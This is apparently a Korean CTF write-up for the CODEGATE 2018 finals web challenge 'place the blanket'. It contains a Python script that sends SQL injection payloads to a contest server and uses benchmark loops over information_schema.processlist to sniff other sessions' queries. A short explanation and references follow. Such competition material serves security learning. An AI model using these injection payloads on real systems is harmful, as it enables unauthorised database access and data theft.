[codegate2018 final]place the blanket

import requests
#bbs(title,writer,contents)
url='http://110.10.147.36/write_ok.php'
sid='35p14j8h1all6avl46rcopfm34'
for i in range(1):
    print str(i)
    title='ss'+str(i)

    query="qwer'),('gogo','say222',(select group_concat(info) from information_schema.processlist))#"
    query2="qwer'),('gg4','say222',(select group_concat(benchmark(99999999,@query:=concat(@query,(select group_concat(info) from information_schema.processlist))),@query)))#"
    query2 = "qwer'),('gg5','say222',(select group_concat(@q3:=0x3333,benchmark(99,@q3:=concat(@q3,(select group_concat(info) from information_schema.processlist where info like '%create%'))),@q3)))#"
    #query2 = "qwer'),('gg4','say222',(select @q3:=0x3232))#"
    #query2 = "qwer'),('gg','say222',(select @q3))#"

    #query="qwer'),('gg','say222',(select group_concat(current_statement) from sys.processlist))#"
    res = requests.post(url, data={'title': title, 'contents': query2}, cookies={'PHPSESSID': sid})
    #for i in range(1):
    #    d=requests.get('http://110.10.147.36/?p=secret&C=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&T=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&F=cccccccccccccccccccccccccccccccc',cookies={'PHPSESSID':sid})
    #res=requests.post(url,data={'title':title,'contents':query},cookies={'PHPSESSID':sid})
    print res.text

대회때 못풀었다. 사실 웹문제는 우리팀은 버릴 예정이었다. 시간이 ㅁㅏㄴㅎ이남지 않는이상..

팀에 웹해커가 없다는게 구멍이 너무 컸다... 할말이 많으니 후기 글을 따로 써봐야겠다.. 

diary content에 sql injection이 있었고

benchmark로 루프를 돌리면서 secret에 있는 select문을 돌려주면 processlist에서 쿼리문을 스니핑 할 수 있다.

참고

rubiya님의 발표자료

http://secuinside.com/archive/2017/2017-1-2.pdf

http://chaneyoon.tistory.com/333